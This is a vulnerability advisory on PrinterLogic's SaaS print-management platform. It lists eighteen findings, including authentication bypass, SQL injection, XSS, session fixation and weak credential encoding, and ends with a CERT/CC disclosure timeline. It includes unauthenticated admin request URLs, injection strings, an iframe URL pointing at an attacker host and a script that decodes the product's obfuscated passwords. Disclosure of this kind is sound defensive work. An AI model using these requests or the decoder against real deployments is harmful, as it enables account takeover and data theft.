## https://sploitus.com/exploit?id=PACKETSTORM:172643
PrinterLogic SaaS, multiple vulnerabilities
PrinterLogic's Enterprise Print Management software allows IT
professionals to simplify printer driver management and empower end
-- https://www.printerlogic.com/
The following findings were identified by performing both dynamic
testing of the PrinterLogic SaaS platform and code analysis of the
source code contained in the virtual appliance available for download
from the PrinterLogic website (Build 1.0.757: July 29th, 2022).
The vulnerabilities were discovered by Eldar Marcussen, Gareth
Phillips, Jeff Thomas, Luke Symons, Nadeem Salim, Stephen Bradshaw,
Tony Wu and Yianna Paris.
OVE-20230524-0001 Authentication bypass
As the application is not using a central framework for handling
authentication and authorization the individual PHP files must all
implement authentication and authorization checks in a consistent same
way. However, this is not the case and many of the administrative
files are missing authentication checks completely, allowing
unauthenticated access to administrative scripts via their direct
For example:
* https://example.printercloud10.com/admin/query/reports.php?action=start_database_query&export=0&report_type=Overview+-+By+Week&sort_by=&sort_order=0&page=1&start_date=2023%2F01%2F11&stop_date=2023%2F01%2F11&start_time=12%3A00+AM&stop_time=11%3A59+PM&time_offset=39600&order=&user_name=&job_title=&computer_name=&manager_name=&department_name=&printer_name=&printer_type=printer_type_tcpip&job_type=job_type_scan&user_name_wildcard=*&company_name_wildcard=*&job_title_wildcard=*&manager_name_wildcard=*&department_name_wildcard=*&printer_name_wildcard=*&folder_path=Test&show_tcpip_printers=1&show_usb_printers=1&show_folder_accumulate=0
* https://example.printercloud10.com/admin/api/advanced-groups?limit=25
It also appears possible for an unauthenticated attacker to alter the
idp configuration of the SaaS service, however due to lack of
integration this was not tested further, the following request
contains no authentication or session details, but did receive a `{
"message":"success"}` json response:
PUT /api/authn/save-idp-settings HTTP/2
Host: example.printercloud10.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)
Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 2
OVE-20230524-0002 SQL injection
Overall the application does not use parameterized queries when
retrieving data, but rather uses a custom DAO framework which utilises
several escaping functions that attempt to prevent SQL injection using
various string handling functions. These are either custom functions -
a practice that is not recommended, or rely on
mysqli_real_escape_string(), which has a number of flaws, resulting in
conditions where SQL injection is possible. For example, the following
function that tries to avoid injection via the backtick character is
flawed as it does not also handle escape sequences:
public function escapeMySQLSchemaName($identifier) { return "`" .
str_replace("`", "``", $identifier) . "`"; }
If an attacker supplied the string ```abc\`,injected``` then function
would return ```abc\``,injected``` where the first backtick is escaped
and the second terminates an existing backtick defined string.
In some cases, input does not appear to be filtered or validated at
all. For example, the offset parameter in the admin/query/reports.php
script mentioned in the authentication bypass issue,
We can simulate this by combining the functions from the different
files as follows and see that the offset value is successfully
injected, however due to how MySQL handles group by expressions it
would be difficult to find an injection payload that doesn't break the
SQL syntax and has a valid group by statement.
// print_stat_dao.php gets called from overview_total_per_week()
function per_week_columns($time_offset) {
// Use UTC for the "WHERE" clause (since printed, $start and $stop
are in UTC), but local time for everything else
$local_printed = "TIMESTAMPADD(SECOND, $time_offset, printed)";
return "WEEK($local_printed, 2) AS current_week,
YEAR($local_printed) AS current_year,
$local_printed AS local_printed
function per_week_group_by($time_offset) {
$adjusted_printed = "TIMESTAMPADD(SECOND, $time_offset, printed)";
return "WEEK($adjusted_printed, 2)";
function per_week_order_by($time_offset) {
$adjusted_printed = "TIMESTAMPADD(SECOND, $time_offset, printed)";
return "YEAR($adjusted_printed), WEEK($adjusted_printed, 2)";
function per_year_group_by($time_offset) {
$adjusted_printed = "TIMESTAMPADD(SECOND, $time_offset, printed)";
return "YEAR($adjusted_printed)";
// print_stat_dao.php helper function
// Date allows invalid data in time_offset
// is_valid_date_time does not, but offset isn't used there (FTW!)
function create_start_stop_dates($start_date, $start_time, $stop_date,
$stop_time, $time_offset) {
// Convert dates to UTC
$start = $start_date . " " . $start_time;
$stop = $stop_date . " " . $stop_time;
if (!is_valid_date_time($start_date, $start_time)) {
echo "Invalid start date/time: $start";
return false;
if (!is_valid_date_time($stop_date, $stop_time)) {
echo "Invalid end date/time: $stop";
return false;
if (strtotime($start) > strtotime($stop)) {
echo "Start date/time is later than end date/time: $start > $stop";
return false;
$start = date("Y-m-d H:i:00", strtotime($start_date . " " .
$start_time) - $time_offset);
$stop = date("Y-m-d H:i:59", strtotime($stop_date . " " .
$stop_time) - $time_offset);
return array($start, $stop);
// Helper function requires specific formats for start/stop date/time
function is_valid_date_time($date, $time) {
$format = "Y/m/d h:i A";
$date = $date . " " . $time;
$current = DateTime::createFromFormat($format, $date);
if (!$current)
return false;
return $current && $current->format($format) == $date;
// Simulate user supplied data and flow for overview_total_per_week()
in print_stat_dao.php
// This gets called from ../../helpers/reports.php for the following
report type:
// case "Overview - By Week":
// 101 array_push($ids,
// 102
$print_stat_dao->overview_total_per_week($start_date, $start_time,
$stop_date, $stop_time, $time_offset));
$time_offset="600, injected)) -- ";
$start_time="11:25 AM";
$stop_time="11:55 AM";
$dates = create_start_stop_dates($start_date, $start_time, $stop_date,
$stop_time, $time_offset);
$start = $dates[0];
$stop = $dates[1];
$per_week_columns = per_week_columns($time_offset);
$per_year_group_by = per_year_group_by($time_offset);
$per_week_group_by = per_week_group_by($time_offset);
$per_week_order_by = per_week_order_by($time_offset);
$permissions_filtered_print_stats_where_clause = "1=1";
$query = "
SUM(mono_duplex_count + mono_simplex_count +
color_duplex_count + color_simplex_count) as total_pages,
SUM(mono_duplex_cost + mono_simplex_cost + color_duplex_cost
+ color_simplex_cost) AS total_cost,
(printed BETWEEN '$start' AND '$stop') and (job_type <> 4) and
echo "$query\n;\n\n\n";
OVE-20230524-0003 Cross site scripting
Several instances of cross site scripting were identified in the application:
* https://example.printercloud10.com/admin/query/advanced_search.php
(q parameter)
* https://example.printercloud10.com/app/app_requests.php (action parameter)
* https://example.printercloud10.com/generators/standalone_autodownload_applet.php
(name parameter)
These could be used to attack application users or hijack an
administrative account by leaking the users session cookies via the
/admin/cookies URL.
OVE-20230524-0004 Session fixation
The /admin/query/verify-login.php script does not issue a new session
identifier after login. An attacker could prime a known session id for
a user via xss, a phishing or watering hole attack and then later
access the application using the known session id to bypass
authentication. The following scripts also appears to grant
full/partial session control based on url parameters:
* Http/Api/Controllers/PrinterController.php:
$sessionId = $request->input('sessionId');
* console_release/xerox/xerox_session.php:
$xerox_session_vo->id = requestint('session', 0);
* console_release/xerox/xerox_session.php:
$xerox_session_vo->session_id = requeststr('session_id', '');
* console_release/xerox/xerox_session.php:
$xerox_session_vo->id = requestint('session', 0);
* state/query/console_release.php: $_SESSION['toshibaSessionId']
= requeststr('session_id', '');
OVE-20230524-0005 Password in URL
It is possible to login as admin via:
* https://example.printercloud10.com/admin/query/verify_login.php?user=MHg1flFXUnRhVzUySDI5QUNsOFJLQlUwUUV0amNTWnlNVHRCS1NNK0dSRkZSVU5XQTNjZkRYa1JSeXRYWDJsQktnNVhkQTFUSGlackxRRkRKbEVHRE&password=MHgxNn5ORVZPVWxWaU0xQkRielJoYzFkcVYyOXdja1pCUlJONldrRmNhVjROUW5wSUh5STVaMUZERFdSZlJHTUNTUjVEY0VKZkx3SXhCRkF5SURaRU&credential_enc=true
This could lead to passwords leaking to third parties via referrer
headers, browser history, server logs, proxy logs, URL shortening
services, etc. Although these passwords are encoded in the URL, they
are trivial to decode to plaintext as evidenced elsewhere in the
OVE-20230524-0006 Plaintext passwords in logs
The application was found to log request data which may include
passwords and, in some cases, explicitly log plaintext passwords. This
includes, but is not limited to:
* /console_release/hp/install_popup_load.php
$XRX_USERNAME = substr(base64_decode(requeststr('username', '')), 0, -30);
$XRX_PASSWORD = Printer::unObfuscate(requeststr('password', ''));
Log::debug('hp, 1.txt, ' . requeststr('username', '') . ', ' . $XRX_USERNAME
. ', ' . requeststr('password', '') . ', ' . $XRX_PASSWORD);
OVE-20230524-0007 Weak password encryption/encoding in use
The application appears to be storing passwords using unsalted sha1
hashing, and transmitting authentication data using a custom double
base64 encoding, as seen in the URL in password issue.
lib/dao/user_dao.php line: 154
function make_user($username,$mypass,$first,$last,$type,$myco,$email) {
//this function is very similar to the automatically created
new_XXX function of daos...
//I've converted your function just so you still have it.
$securepass = sha1($mypass);
$vo=new user_vo();
$vo->str_email_address=$emai l;
return $this->new_user($vo);
The application uses a double base64 encoding to obfuscate usernames
and passwords, with a length field to avoid reading padding data.
However, they can easily be recovered with a simple script:
function decodeCredentials($encodedStr)
$firstDecode = base64_decode($encodedStr);
if (empty($firstDecode)) {
return '';
}//end if
$encodedParts = explode('~', $firstDecode);
if (count($encodedParts) < 2) {
return '';
}//end if
// length of the unencoded credential
$len = hexdec($encodedParts[0]);
$decodedCredential = base64_decode($encodedParts[1]);
if (empty($decodedCredential)) {
return '';
}//end if
//extract the unencoded credential from the padding
$credential = substr($decodedCredential, 0, $len);
return urldecode($credential);
// outputs 4ENRUb3PCo4asWjWoprFAE
echo decodeCredentials("MHgxNn5ORVZPVWxWaU0xQkRielJoYzFkcVYyOXdja1pCUlJONldrRmNhVjROUW5wSUh5STVaMUZERFdSZlJHTUNTUjVEY0VKZkx3SXhCRkF5SURaRU");
OVE-20230524-0008 Insufficient CSRF protection
The application does not enforce CSRF checks for the majority of its
forms, even for the requests that have a value present in a header,
cookie or form, testing found that changing or removing the value had
no actual impact on the success of the operation:
POST /admin/query/reports.php HTTP/2
Host: example.printercloud10.com
Cookie: PHPSESSID=ubbd04d1j65555mv2t8p07eqam;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)
Gecko/20100101 Firefox/108.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 596
Origin: https://example.printercloud10.com
Dnt: 1
Referer: https://example.printercloud10.com/admin/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
OVE-20230524-0009 Insufficient anti virus protection
Printer drivers are manually uploaded by admins and assigned to
printers. The PrinterLogic application allows drivers containing known
malicious code to be uploaded.
OVE-20230524-0010 Insufficient authorization checks
While the application supports several user levels, most of the
individual PHP scripts does not implement granular access control
based on roles, but simply rely on an authentication check (if
present) like this:
if(!GLOBALS::$login->is_logged_in()) {
This is distinctive from pages that implements a role based check,
such as /admin/design/management_accountts_users.php
$user_permissions = UserPermissions::create_for_current_user();
$pagePermission =
if (!$pagePermission) {
respond_html_failure(UserPermissions::INSUFFICIENT_PERMISSIONS_MESSAGE, "");
OVE-20230524-0011 Administrative user email enumeration
The forgot password function will confirm if an email address exists
or not and can be used to enumerate users/emails.
OVE-20230524-0012 Arbitrary content inclusion via iframe
The following URL will include an arbitrary URL in an iframe, this
could be used to redirect the application using a frame busting
technique, execute JavaScript or initiate file downloads from an
untrusted source.
* https://example.printercloud10.com/generators/standalone_autodownload_applet.php?server=https://attackerurl&node_id=bbbb&file=ccccc&dialog=dddd&name=eeee&path=fffff
OVE-20230524-0013 Remote network scanning (XSPA)/DoS
There are several php files that will initiate user-controlled
connections to third party IP/port combinations over protocol such as
LDAP, IMAP, SMTP, telnet, etc. Telnet scanning (and possibly others)
runs until the connection closes so could lead to DoS condition by
consuming all web server workers
* https://example.printercloud10.com/email/email_printing_test.php?test_type=CONNECTION&connection_type=IMAP
* https://example.printercloud10.com/admin/query/test_ldap_settings.php?action=test_connection_to_server&server=ldapsdns,.com&ldaps=0&ldap_port=8080
* https://example.printercloud10.com/console_release/fast_release/rfideas_241_install.php?printer_id=1&ip_address=lostworldsbbs.com
OVE-20230524-0014 Insufficient signature validation
Printer drivers are manually uploaded by admins and assigned to
printers. The PrinterLogic application allows drivers to be uploaded
that are not cryptographically signed with valid certificates from a
trusted authority.
OVE-20230524-0015 Device impersonation
In at least one area of the PrinterLogic system, authorised devices
are identified by machine name. It is possible to rename a host and
have this impact another authorised devices records in at least one
OVE-20230524-0016 Oauth security bypass
PrinterLogic clients need an authorization code to authenticate and
being authorised devices. These are sent by the Printer Installer
Client desktop application, which receives an access token as a
This token is then used for all authenticated requests from the
desktop application.
When signing into the web application, there is an option to sign in
as the Current User. This sends encrypted information to the server
using the siddata parameter.
As symmetric encryption is used, and the key is easily obtainable from
the client-side applications, it is possible to decrypt, modify and
re-encrypt this data.
OVE-20230524-0017 Cookie returned in response body
The URL /admin/cookies returns the cookie values in the page body.
This breaks the HTTPOnly cookie security control used to prevent
JavaScript from accessing the cookie values during a session hijacking
OVE-20230524-0018 Known vulnerable components in use
The use of third-party JavaScript libraries can introduce a range of
DOM-based vulnerabilities, including some that can be used to hijack
user accounts like DOM-XSS.
4 instances of this issue were identified, at the following locations:
* /admin/map_bg/map_upload_bg.php
* /assets/scripts/common-bb625e26df.js
* /assets/scripts/common-fcc1983a7e.js
* /assets/scripts/jquery-40c7c38831.form.js
2023-02-01 - Vulnerability details shared with CERT/CC
2023-02-09 - CERT/CC reached out to vendor
2023-02-10 - Reached out to vendor directly advicing them of the
CERT/CC submission
2023-03-14 - Vendor responded
2023-03-14 - Updated CERT/CC on vendors response
2023-02-14 - CERT/CC reached out to vendor again
2023-02-15 - Responded to vendor, again directing them to CERT/CC for
vulnerability details and disclosure coordination
2023-02-17 - Vendor responded
2023-02-17 - Responded to vendor, again directing them to CERT/CC for
vulnerability details and disclosure coordination
2023-03-17 - Updated CERT/CC on vendors response
2023-03-28 - Requested status update from CERT/CC
2023-04-06 - Requested status update from CERT/CC
2023-04-06 - CERT/CC adviced vendor has responded to emails, but not
joined the VINCE platform
2023-04-11 - Reached out to vendor directly on behalf of CERT/CC
2023-04-11 - Vendor responded
2023-04-14 - Requested update from CERT/CC
2023-04-21 - Vendor joins VINCE
2023-04-21 - Vendor requests extension to disclosure timeline
2023-04-22 - Vendor advices they cannot locate the vulnerability details
2023-04-25 - Offer vendor 30 day timeline extention, provide copy of
draft advisory and request CVE identifiers from CERT/CC
2023-04-26 - CERT/CC confirms vulnerability details availability to
vendor, advices to request CVEs directly from MITRE
2023-04-26 - Vendor confirms receipt of vulnerability details
2023-04-27 - Submit CVE request to MITRE
2023-05-09 - Vendor shares vulnerability details with their product team
2023-05-17 - Request update from MITRE
2023-05-18 - Advice vendor and CERT/CC that advisory will use OVE
identifiers if CVE identifiers have not been issued prior to
2023-05-18 - Vendor request additional disclosure delay in order to
triage issues
2023-05-24 - Vendor request additional disclosure delay in order to
triage issues
2023-05-24 - Vendor disputes issues OVE-2023240006 (legacy code),
OVE-2023240008 (legacy code), OVE-2023240010 (researchers didn't
specify all the places this needs to be fixed), OVE-2023240014 (won't
2023-05-25 - Public disclosure
????-??-?? - Patch available